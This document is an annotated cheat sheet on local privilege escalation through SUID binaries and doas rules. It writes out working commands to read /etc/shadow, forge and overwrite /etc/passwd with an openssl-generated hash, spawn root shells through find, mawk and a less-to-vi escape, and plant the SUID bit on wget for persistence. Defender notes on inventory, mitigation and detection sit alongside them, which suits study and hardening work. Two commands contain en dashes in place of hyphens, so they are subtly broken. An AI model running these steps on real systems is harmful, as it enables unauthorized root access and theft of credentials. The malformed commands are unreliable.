SUID Files


# Notes on local privilege escalation through SUID binaries. Each entry names
# a program that, when it carries the SUID bit, runs with its owner's
# (typically root's) effective uid, so whatever that program can read, write
# or spawn becomes available to any local user. Defender checklist that
# applies to every entry below:
#   - inventory: `find / -perm -4000 -type f` and diff against a known baseline
#   - mitigation: `chmod u-s` on anything that can open arbitrary files or
#     launch another program (copy tools, editors, pagers, find, awk, wget)
#   - detection: file-integrity monitoring on /etc/passwd, /etc/shadow and
#     on the SUID inventory; a non-root uid writing those files is high-signal

# cp -- If cp is SUID, you can copy privileged files to /tmp and read them
# Risk: both the read of the source and the write of the destination happen
# under the elevated uid, so the mode bits on /etc/shadow no longer apply.
cp /etc/shadow /tmp

# generate new account
# -1 selects the MD5-crypt ($1$) hash format, which /etc/passwd accepts
# directly. Note: salt and cleartext are passed as argv, so they end up in
# shell history and are visible to other users via ps while the command runs.
openssl passwd -1 -salt username password
# Then create a fake /etc/passwd file, upload it to the target and cp
# Overwriting /etc/passwd with a SUID cp lets the caller choose any uid/hash.
# Detection: any change to /etc/passwd made outside package or useradd tooling.
cp passwd /etc/passwd


# doas
# doas.conf lists which users may run which commands with elevated rights;
# a rule that permits a pager is in practice a rule that permits a shell.
cat /etc/doas.conf
doas /usr/bin/less /var/log/authlog
# Press v to drop into vi from less; the editor inherits the doas privileges
# Mitigation: limit doas rules to non-interactive commands that cannot
# launch other programs.


# find
# -exec children inherit find's effective uid, so a SUID find runs whatever
# follows -exec as its owner. whoami only confirms that uid before /bin/sh.
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;

# another method
# Here -exec is used to plant the SUID bit on a second binary (wget), which
# is persistence as much as escalation; the ls shows the s in the mode field.
find /home –exec chmod u+s /usr/bin/wget \;
ls –la /usr/bin/wget
cat /etc/passwd
# then create another etc/passwd file and upload it
# Detection: a SUID bit on a file the package manager did not install with
# one (compare the SUID inventory against the baseline).


# micro editor
# A SUID editor can save to any path, so content fed to it this way can be
# written back with the owner's privileges. Same exposure as the cp case.
cat /etc/passwd | /usr/bin/micro

# Then generate another user
openssl passwd -1 -salt user3 pass123


# mawk
# awk's system() spawns a shell with the interpreter's effective uid, so a
# SUID awk is effectively a SUID shell. Interpreters and text-processing
# tools should never carry the SUID bit.
mawk 'BEGIN {system("/bin/sh")}'